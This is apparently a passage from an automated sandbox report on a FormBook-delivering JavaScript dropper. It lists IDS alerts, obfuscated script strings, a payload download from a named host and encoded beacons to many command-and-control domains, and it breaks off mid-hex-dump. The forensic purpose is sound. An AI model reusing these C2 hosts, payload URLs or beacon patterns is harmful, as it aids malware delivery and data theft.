          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49715 -> 66.96.162.149:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49715 -> 66.96.162.149:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 23.227.38.74:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 23.227.38.74:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 23.227.38.74:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49724 -> 199.192.28.121:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49724 -> 199.192.28.121:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49724 -> 199.192.28.121:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49742 -> 87.236.16.153:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49742 -> 87.236.16.153:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49742 -> 87.236.16.153:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49743 -> 14.128.47.126:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49743 -> 14.128.47.126:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49743 -> 14.128.47.126:80
          Performs DNS queries to domains with low reputation
          Source: C:\Windows\explorer.exeDNS query: www.deglaz.xyz
          JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
          Source: 0900664 MOHS Tender..jsReturn value : ['3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI1', 'WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL', 'tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk', 'MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk4B2fiW4xdTW,bmo7FSk', 'jjEhYu,WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyf']Go to definition
          Source: 0900664 MOHS Tender..jsReturn value : ['jjEhYu,WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyf']Go to definition
          Source: 0900664 MOHS Tender..jsReturn value : ['"Send"']Go to definition
          Source: 0900664 MOHS Tender..jsReturn value : ['"MSXML2.XMLHTTP"']Go to definition
          Source: 0900664 MOHS Tender..jsReturn value : ['"Send"']Go to definition
          Source: 0900664 MOHS Tender..jsReturn value : ['"MSXML2.XMLHTTP"', '"Send"']Go to definition
          Source: 0900664 MOHS Tender..jsReturn value : ['Shell.Application,ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,127754']Go to definition
          Source: 0900664 MOHS Tender..jsReturn value : ['F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,', '45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,', 'SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://', 'MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,W7mUrSkZ,', '12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,']Go to definition
          Source: 0900664 MOHS Tender..jsReturn value : ['"ResponseBody"']Go to definition
          Source: 0900664 MOHS Tender..jsReturn value : ['"MSXML2.XMLHTTP"', '"Send"']Go to definition
          Source: 0900664 MOHS Tender..jsReturn value : ['3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI1', 'WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL', 'jjEhYu,WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyf']Go to definition
          Source: 0900664 MOHS Tender..jsReturn value : ['"MSXML2.XMLHTTP"', '"Send"']Go to definition
          Source: 0900664 MOHS Tender..jsReturn value : ['jjEhYu,WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyf']Go to definition
          Source: 0900664 MOHS Tender..jsReturn value : ['Shell.Application,ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,127754']Go to definition
          Source: 0900664 MOHS Tender..jsReturn value : ['FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Sc', 'cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.F', 'pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVe', 'ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdS', 'vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7', 'Shell.Application,ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,127754', '12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,']Go to definition
          Source: 0900664 MOHS Tender..jsReturn value : ['3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI1', 'WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL', 'jjEhYu,WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyf']Go to definition
          Source: 0900664 MOHS Tender..jsReturn value : ['"Send"']Go to definition
          Source: 0900664 MOHS Tender..jsReturn value : ['jjEhYu,WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyf']Go to definition
          Source: 0900664 MOHS Tender..jsReturn value : ['FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Sc', 'cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.F', 'pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVe', 'ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdS', 'vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7', 'Shell.Application,ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,127754', '12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,']Go to definition
          Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: global trafficHTTP traffic detected: GET /czni/?20=4xfPiv3RnE&z8rul-n=fBMxo69x1QXNWuc9hyM7d4IFsS8MYdi4DQWD1kEEyFhAPfH6LtWDKNH9q/ewbXUtBA348B3g5uC8JLGqihwz/XjbfKo4x0QdAA== HTTP/1.1Host: www.panalobet88.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /czni/?z8rul-n=E4OQobxTIZHI9DwF67UlwwaqlZHGKxy7UPoiurSE2O3aUzyIC/5i48ZUEimfrB3iPtHclG/TUXxg+aW3JsqIZG+/wkw9ZppI6Q==&20=4xfPiv3RnE HTTP/1.1Host: www.toporsche.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /czni/?20=4xfPiv3RnE&z8rul-n=q4vOuZlu2gw387VDV10PDpiWTFl2xG2mj37j5EK3EACa1yxM1cLCbJZ7QUgC2jLM/Tg8TnJqujzMrtpKg/UGeVYytsfF/XPvWg== HTTP/1.1Host: www.chimid.orgConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /czni/?z8rul-n=06gIUCFIBOa1TNKOgihx1QaHEyCsoo2zVarqfXE1BGhN6bynIxp2kNvfG92v3asKvvgl0gKrl2tBRyImUhoMMpO0yMdYVRtJxA==&20=4xfPiv3RnE HTTP/1.1Host: www.genuineinsights.cloudConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /czni/?20=4xfPiv3RnE&z8rul-n=DD3LLnJbgjRI3wbnkxRSCI8A3gaHykSHoexTe78K7+O1bJpnCKZS4RFcfu7PoQdaWmtTlOOE5dVeManAz6l5Ezu0dt1GwRw+Ew== HTTP/1.1Host: www.44yyds.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /czni/?z8rul-n=NBbLbMKCnleo0bnLNJr7y57f08wHeLbsflpVfs6UmX5SvZLxN88Gw8EeREzrIsvGXit/2Ohq43fDpUBAiFCfWP8z8U1D0vMs/Q==&20=4xfPiv3RnE HTTP/1.1Host: www.yeah-go.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /czni/?20=4xfPiv3RnE&z8rul-n=5oRHUQDtYJ3jH+KiyYuXif0R6NF655imjfvnRa6lV5c+zSwVFD4ch3jkTam3ow4RLLhVoDNP5tCGnm9XMNb3kyjT9rM2PcJgOg== HTTP/1.1Host: www.frogair.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /czni/?z8rul-n=y4naTkG6lumfG07sOssNMJlhuzOAznpWNSZYkPg2bq4ikF6oslohHoKN6Rf87KyLhWahQVt7sEYulG9jlpJKSoDlIP2gQN5V1A==&20=4xfPiv3RnE HTTP/1.1Host: www.deglaz.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /czni/?20=4xfPiv3RnE&z8rul-n=CEJ5RAslKFrvYswGKkWFaMEg5PbGdI0uMfwhN2QDDZMYEZrXiZBgo1mjS41e+07AKrnAHTFcuEyQDmPBY1Lnrpc7hFsEfyPzNg== HTTP/1.1Host: www.laylaroseuk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /czni/?z8rul-n=Pl1f6CcPgRBbBLamGgJlBKsDaKeibUUROb0ghzsubaIK3xnCplVa9FjztovwbGNPlK34MFgEpzS+BZjpXc1RGWmrSHwVxpGmpQ==&20=4xfPiv3RnE HTTP/1.1Host: www.lakeviewautomation.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /czni/?20=4xfPiv3RnE&z8rul-n=pjpdKCpJnNXPdeWbwYyFkbOLSaKVTVa2roCT8abPBwtlkFjZcqcvSY6Wc82/f3EmpMB4AQ+PhDNFqdOW9DbfejlZOApCjfoJ4Q== HTTP/1.1Host: www.dellaone.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /czni/?z8rul-n=7CuzI5hL2DbaheDUreUXt/0ggIp8KK0y2ydS3GGUn+rOJNFozWHMconX3zZMJG7nrNLowVQEJNRqJBBdS7PrQOxc+aMUIwOUOQ==&20=4xfPiv3RnE HTTP/1.1Host: www.arritalvigo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /czni/?20=4xfPiv3RnE&z8rul-n=jZ3aVVsOPCQ8zDolwfPMJ0FgyASOdlT+pUUZWGluxzeJivrfCzX4+7jeTlPikh1G7PP+5G6V9EQpGQT3uHsK4bLie7FdC0b4pw== HTTP/1.1Host: www.versusfinances.techConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /czni/?z8rul-n=XafM9ufeulvUyazB3PczebMntNGhHBxQYaw7zhnKr1/uYxmt3ImqmxlzRjnKksyV1dU+VPei5c3Iajrs/dC16sOcVh74K2vF1w==&20=4xfPiv3RnE HTTP/1.1Host: www.hayethe.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /czni/?20=4xfPiv3RnE&z8rul-n=4iC+VHkN7UzSdUovnFh7HjvkVuvE2o78vWsfJQRZ88kc+lrgrCCJnpqL68g1VIZYfy6U/dRc4iar4OlCjHSLY4rOm4VqYu/FMA== HTTP/1.1Host: www.octohoki.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /czni/?z8rul-n=MumrQfrFlOyD9XsP8OR0UClXFyftPmtzTeYgycr6a5IUfga2ox/HNpA7pnpLcbk4ltNykJNVaPuH0Ad8Q8mslGHvUdw/9wroMg==&20=4xfPiv3RnE HTTP/1.1Host: www.hougou.ruConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /czni/?20=4xfPiv3RnE&z8rul-n=fBMxo69x1QXNWuc9hyM7d4IFsS8MYdi4DQWD1kEEyFhAPfH6LtWDKNH9q/ewbXUtBA348B3g5uC8JLGqihwz/XjbfKo4x0QdAA== HTTP/1.1Host: www.panalobet88.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ti/winner.exe HTTP/1.1Accept: */*Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: hirosguide.huConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /czni/ HTTP/1.1Host: www.toporsche.onlineConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.toporsche.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.toporsche.online/czni/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 38 72 75 6c 2d 6e 3d 4a 36 6d 77 72 74 4a 74 65 61 62 54 6c 53 30 52 34 73 49 45 37 78 6d 69 6d 35 6d 6c 4a 41 7e 4e 56 75 70 7a 34 75 71 62 34 73 54 4c 54 42 43 56 46 71 4e 45 74 4f 4d 49 64 43 7e 6e 74 77 47 79 48 5a 79 63 6c 58 54 77 56 54 67 61 78 64 79 43 45 4e 54 71 56 6a 75 79 38 6a 39 46 53 71 31 65 6c 76 53 74 72 66 41 78 62 63 57 36 39 53 39 70 71 36 69 43 30 53 72 66 6d 76 46 72 7a 61 78 55 4f 31 54 70 51 4b 57 4d 76 61 62 6a 6d 58 7a 43 6f 30 65 62 44 41 78 69 6a 75 52 64 45 2d 68 50 65 70 6b 49 31 79 61 35 36 41 6f 51 31 4f 48 4f 61 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: z8rul-n=J6mwrtJteabTlS0R4sIE7xmim5mlJA~NVupz4uqb4sTLTBCVFqNEtOMIdC~ntwGyHZyclXTwVTgaxdyCENTqVjuy8j9FSq1elvStrfAxbcW69S9pq6iC0SrfmvFrzaxUO1TpQKWMvabjmXzCo0ebDAxijuRdE-hPepkI1ya56AoQ1OHOaA).
          Source: global trafficHTTP traffic detected: POST /czni/ HTTP/1.1Host: www.chimid.orgConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.chimid.orgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.chimid.org/czni/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 38 72 75 6c 2d 6e 3d 6e 36 48 75 74 70 70 51 71 79 55 75 68 37 42 59 58 45 38 52 57 49 53 38 45 68 68 31 32 53 57 6b 6d 48 58 42 68 69 54 72 41 68 65 6f 39 77 78 4f 39 2d 72 35 4f 4b 59 36 65 6d 55 4a 39 56 61 63 39 33 5a 68 53 77 31 79 68 6b 4c 53 6d 61 4e 49 71 64 4e 71 55 46 78 57 6f 49 44 49 39 52 79 69 56 71 67 30 77 6e 44 46 4c 30 4a 6a 34 72 53 62 44 6a 7e 46 42 67 4d 46 49 79 59 48 4a 76 7a 4e 44 36 63 5f 4b 48 55 59 31 58 56 58 56 52 43 6c 4c 48 72 33 42 6e 55 6b 4a 58 6a 5f 6d 36 48 6b 6d 5a 6f 65 4f 7a 5a 36 44 7a 75 67 56 36 71 76 4e 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: z8rul-n=n6HutppQqyUuh7BYXE8RWIS8Ehh12SWkmHXBhiTrAheo9wxO9-r5OKY6emUJ9Vac93ZhSw1yhkLSmaNIqdNqUFxWoIDI9RyiVqg0wnDFL0Jj4rSbDj~FBgMFIyYHJvzND6c_KHUY1XVXVRClLHr3BnUkJXj_m6HkmZoeOzZ6DzugV6qvNw).
          Source: global trafficHTTP traffic detected: POST /czni/ HTTP/1.1Host: www.genuineinsights.cloudConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.genuineinsights.cloudUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.genuineinsights.cloud/czni/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 38 72 75 6c 2d 6e 3d 35 34 49 6f 58 33 46 77 65 4d 6d 63 65 66 47 35 74 67 49 49 67 53 32 37 46 30 65 65 36 2d 79 5a 55 4a 43 37 4e 67 49 5a 4f 57 45 37 38 5a 79 79 50 51 64 64 33 38 65 50 50 73 69 6a 38 50 51 65 74 61 31 6c 77 67 7e 57 67 32 78 34 54 6d 63 4b 59 6c 34 72 50 6f 61 73 34 59 59 65 66 33 52 51 39 37 4e 4e 75 6d 52 53 64 79 32 63 39 61 67 71 54 49 45 5f 54 6b 66 68 77 76 34 37 43 65 42 34 4d 49 37 52 50 78 76 72 5a 59 77 68 6e 62 56 5f 51 6b 50 54 35 4e 38 44 57 38 47 46 6d 76 6a 77 73 66 63 71 70 2d 50 48 61 46 5a 37 63 7a 48 58 48 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: z8rul-n=54IoX3FweMmcefG5tgIIgS27F0ee6-yZUJC7NgIZOWE78ZyyPQdd38ePPsij8PQeta1lwg~Wg2x4TmcKYl4rPoas4YYef3RQ97NNumRSdy2c9agqTIE_Tkfhwv47CeB4MI7RPxvrZYwhnbV_QkPT5N8DW8GFmvjwsfcqp-PHaFZ7czHXHQ).
          Source: global trafficHTTP traffic detected: POST /czni/ HTTP/1.1Host: www.44yyds.comConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.44yyds.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.44yyds.com/czni/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 38 72 75 6c 2d 6e 3d 4f 42 66 72 49 52 31 4f 30 52 70 77 78 7a 48 42 7a 51 74 6c 4a 49 6f 7a 68 6d 6d 35 32 31 72 46 74 59 74 52 4e 62 67 77 6a 38 6d 43 59 4e 30 42 4e 37 38 6d 6a 77 34 71 65 66 4c 7a 71 6d 39 6f 64 42 59 57 68 50 69 30 68 49 45 6b 4a 4d 7a 74 35 4b 74 42 4d 57 79 6d 4b 64 45 6c 39 44 30 66 62 46 37 4b 67 70 43 71 35 33 72 58 7a 61 58 4d 45 49 6a 52 7e 59 74 62 72 42 45 68 73 68 69 56 4c 68 38 42 45 52 6b 68 45 37 75 77 75 79 34 47 38 41 43 6c 4a 72 36 37 46 48 73 79 5a 67 36 7a 33 43 71 50 68 7a 66 65 4d 58 6f 50 58 44 48 6c 49 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: z8rul-n=OBfrIR1O0RpwxzHBzQtlJIozhmm521rFtYtRNbgwj8mCYN0BN78mjw4qefLzqm9odBYWhPi0hIEkJMzt5KtBMWymKdEl9D0fbF7KgpCq53rXzaXMEIjR~YtbrBEhshiVLh8BERkhE7uwuy4G8AClJr67FHsyZg6z3CqPhzfeMXoPXDHlIA).
          Source: global trafficHTTP traffic detected: POST /czni/ HTTP/1.1Host: www.yeah-go.comConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.yeah-go.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.yeah-go.com/czni/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 38 72 75 6c 2d 6e 3d 41 44 7a 72 59 35 6d 5a 6e 6e 6d 41 7e 6f 76 71 49 49 50 4b 33 5a 72 50 38 73 49 63 59 64 6e 36 65 6b 46 53 46 38 71 71 6e 46 52 58 68 70 6a 44 47 66 55 76 71 39 31 39 51 51 33 59 47 4e 48 62 41 30 59 65 30 75 4a 49 34 41 33 31 6d 53 5a 76 72 57 61 5f 55 4d 31 51 32 52 41 6a 34 39 49 47 7a 47 51 37 62 30 39 4d 72 34 41 56 6d 62 44 6d 53 6c 4c 72 45 72 61 78 48 77 28 51 5a 6f 38 68 73 53 72 67 67 4c 7a 4b 38 32 76 52 37 64 73 68 46 65 4d 79 4d 65 76 53 53 64 54 76 5a 57 69 48 72 54 39 33 32 74 52 39 56 38 30 5f 6d 6a 44 45 55 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: z8rul-n=ADzrY5mZnnmA~ovqIIPK3ZrP8sIcYdn6ekFSF8qqnFRXhpjDGfUvq919QQ3YGNHbA0Ye0uJI4A31mSZvrWa_UM1Q2RAj49IGzGQ7b09Mr4AVmbDmSlLrEraxHw(QZo8hsSrggLzK82vR7dshFeMyMevSSdTvZWiHrT932tR9V80_mjDEUg).
          Source: global trafficHTTP traffic detected: POST /czni/ HTTP/1.1Host: www.frogair.onlineConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.frogair.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.frogair.online/czni/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 38 72 75 6c 2d 6e 3d 30 71 35 6e 58 6b 7e 59 61 72 28 4b 64 63 75 30 36 71 53 41 68 73 49 34 37 4c 31 57 30 5f 53 73 7a 4e 7a 58 4a 71 7a 6d 61 35 51 55 34 42 41 58 4e 69 51 7a 31 31 43 72 53 4a 4b 56 71 58 51 51 49 4e 77 58 68 44 46 4b 34 62 43 34 70 7a 5a 79 46 38 43 56 77 6e 28 72 79 37 52 4b 4c 61 78 44 42 56 6e 46 4f 4d 32 64 76 43 4f 57 45 57 76 36 57 45 4c 48 55 70 50 57 36 64 51 6b 50 62 78 4e 74 63 6e 64 50 4e 44 6b 74 75 31 52 65 57 36 4a 42 6d 35 2d 47 38 78 41 35 75 49 74 56 50 77 6d 28 73 56 71 4f 67 4d 67 70 72 59 31 7e 4e 6d 44 6d 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: z8rul-n=0q5nXk~Yar(Kdcu06qSAhsI47L1W0_SszNzXJqzma5QU4BAXNiQz11CrSJKVqXQQINwXhDFK4bC4pzZyF8CVwn(ry7RKLaxDBVnFOM2dvCOWEWv6WELHUpPW6dQkPbxNtcndPNDktu1ReW6JBm5-G8xA5uItVPwm(sVqOgMgprY1~NmDmQ).
          Source: global trafficHTTP traffic detected: POST /czni/ HTTP/1.1Host: www.deglaz.xyzConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.deglaz.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.deglaz.xyz/czni/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 38 72 75 6c 2d 6e 3d 28 36 50 36 51 52 65 45 37 39 53 4a 42 6d 43 75 4c 4e 73 46 4d 36 56 57 68 6d 7e 61 67 52 52 57 46 55 42 37 69 4c 73 5a 54 38 77 53 6d 57 65 55 74 46 38 79 51 37 32 43 38 6a 6e 75 79 72 65 6f 30 78 66 35 65 58 68 53 70 77 4d 73 28 77 63 53 67 4c 64 63 57 34 6e 54 45 37 76 38 54 38 42 49 32 62 70 44 7a 7a 45 4e 51 34 63 58 53 64 53 42 50 4b 4b 30 6c 39 4e 63 35 44 57 32 52 45 4a 56 53 4d 5a 33 6e 4e 66 6e 4d 33 62 53 71 33 61 53 6e 71 48 7a 75 42 6e 59 36 53 77 57 75 6e 72 47 75 67 47 67 74 6d 43 54 75 58 33 38 65 61 68 56 58 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: z8rul-n=(6P6QReE79SJBmCuLNsFM6VWhm~agRRWFUB7iLsZT8wSmWeUtF8yQ72C8jnuyreo0xf5eXhSpwMs(wcSgLdcW4nTE7v8T8BI2bpDzzENQ4cXSdSBPKK0l9Nc5DW2REJVSMZ3nNfnM3bSq3aSnqHzuBnY6SwWunrGugGgtmCTuX38eahVXQ).
          Source: global trafficHTTP traffic detected: POST /czni/ HTTP/1.1Host: www.laylaroseuk.comConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.laylaroseuk.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.laylaroseuk.com/czni/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 38 72 75 6c 2d 6e 3d 50 47 68 5a 53 32 63 35 63 55 7a 37 56 63 49 59 4a 58 61 47 65 2d 4e 58 36 76 33 59 64 74 67 32 41 35 63 72 4c 6d 56 56 62 4c 6f 59 4c 37 7a 6a 6a 49 6f 56 38 56 66 65 4c 34 35 55 7a 79 53 53 47 64 53 4c 4f 77 78 66 6d 67 36 31 4e 54 33 68 52 33 28 64 6d 35 55 48 67 67 42 37 53 55 50 48 46 48 65 65 51 38 55 53 77 35 30 6c 6c 53 63 2d 46 43 50 72 70 53 6f 6d 4b 39 5a 68 53 61 34 52 36 71 6c 62 48 6e 4a 4c 54 67 50 41 47 56 55 37 28 72 36 46 65 42 77 46 45 46 28 66 53 44 32 6a 6c 4c 59 74 5a 32 32 44 63 77 69 41 4f 52 37 6c 63 